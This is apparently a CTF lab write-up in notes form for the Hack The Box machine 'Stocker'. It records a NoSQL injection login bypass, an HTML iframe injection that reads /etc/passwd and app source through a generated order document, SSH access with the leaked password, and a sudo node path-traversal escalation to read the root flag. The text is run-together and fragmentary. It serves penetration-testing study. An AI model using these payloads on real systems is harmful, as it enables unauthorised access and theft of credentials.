10.10.11.196
信息搜集 start infoscan10 .10 .11 .196 is alive[*] Icmp alive hosts len is: 1 10.10.11.196:80 open10.10.11.196:22 open[*] alive ports len is: 2 [*] WebTitle:http://10 .10 .11 .196 code:301 len:178 title:301 Moved Permanently 跳转url: http://stocker.htb[*] WebTitle:http://stocker.htb code:200 len:15463 title:Stock - Coming Soon!
echo “10.10.11.196 stocker.htb” >> /etc/hosts
wpscan –url http://stocker.htb/
./gobuster.shhttp://stocker.htb/img (Status: 301) [Size: 178] [–> http://stocker.htb/img/] http://stocker.htb/css (Status: 301) [Size: 178] [–> http://stocker.htb/css/] http://stocker.htb/js (Status: 301) [Size: 178] [–> http://stocker.htb/js/] http://stocker.htb/fonts (Status: 301) [Size: 178] [–> http://stocker.htb/fonts/]
gobuster vhost --url http://stocker.htb/ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain -t 100
echo "10.10.11.196 dev.stocker.htb" >> /etc/hosts
info nginx/1.18.0 (Ubuntu)
http://dev.stocker.htb
getshell Nosql inject
burp repeater
GET /login HTTP/1.1 Host : dev.stocker.htbUser-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : en-US,en;q=0.5Accept-Encoding : gzip, deflateConnection : closeCookie : connect.sid=s%3Apzr1nuOtmsUnoBSx0A0Zi6o9jWDTjgfx.I0oLW4eEyOjzaawO4y68Gxv%2FkmkeID5DmkqCwGJkiWkUpgrade-Insecure-Requests : 1Referer : http://dev.stocker.htb/stockContent-Length : 57{"username" : {"$ne" : null }, "password" : {"$ne" : null } }
burp repeater 2
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 POST /api/order HTTP/1.1 Host : dev.stocker.htbUser-Agent : Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language : en-US,en;q=0.5Accept-Encoding : gzip, deflateConnection : closeCookie : connect.sid=s%3Apzr1nuOtmsUnoBSx0A0Zi6o9jWDTjgfx.I0oLW4eEyOjzaawO4y68Gxv%2FkmkeID5DmkqCwGJkiWkUpgrade-Insecure-Requests : 1Content-Type : application/jsonContent-Length : 370{ "basket":[ { "_id":"638f116eeb060210cbd83a8f", "title":"<iframe src=file:///etc/passwd height=750px width=750px</iframe>", "description":"It's a rubbish bin.", "image":"bin.jpg", "price":76 , "currentStock":15 , "__v":0 , "amount":1 } ] } and responseHTTP/1.1 200 OK Server : nginx/1.18 .0 (Ubuntu)Date : Fri, 16 Jun 2023 14 :12 :45 GMTContent-Type : application/json ; charset=utf-8 Content-Length: 53 Connection : close X-Powered-By : Express ETag: W/"35-wdJz8BSxG+QfgESwzE+FGjqXwXk" {"success":true ,"orderId":"648c6dddb1b0836ceb84025a"} http://dev.stocker.htb/api/po/648 c6dddb1b0836ceb84025a it should be Items which you buy, but it give you /etc/passwd content. so we could also get content of /var/www/dev/index .js
Once you get index.js, we found the password, and try ssh to connect.
ssh angoose@10.10.11.196
sudo提权 sudo -l
[sudo] password for angoose: for angoose on stocker:/usr/ local/sbin\:/u sr/local/ bin\:/usr/ sbin\:/usr/ bin\:/sbin\:/ bin\:/snap/ bin/usr/ bin/node /u sr/local/ scripts/*.js
cp root-flag.js /usr/local/scripts/
/usr/local/scripts
sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/root-flag.js
root-flag.js
const fs = require ('fs' );'/root/root.txt' , 'utf8' , (err, data) =>if (err) throw err;console .log(data);
conclusion 1. what is VHOST enumeration mode? 它的原理是什么,为什么能枚举出子域名? https://github.com/EdgeSecurityTeam/EHole/releases/download/v3.1/EHole_linux_amd64.zip ./EHole_linux_amd64 finger -u http://dev.stocker.htb/login -l finger.json
3. filezilla installed faster file transfer
4. sudo -l sudo -l
User angoose may run the following commands on stocker:
reference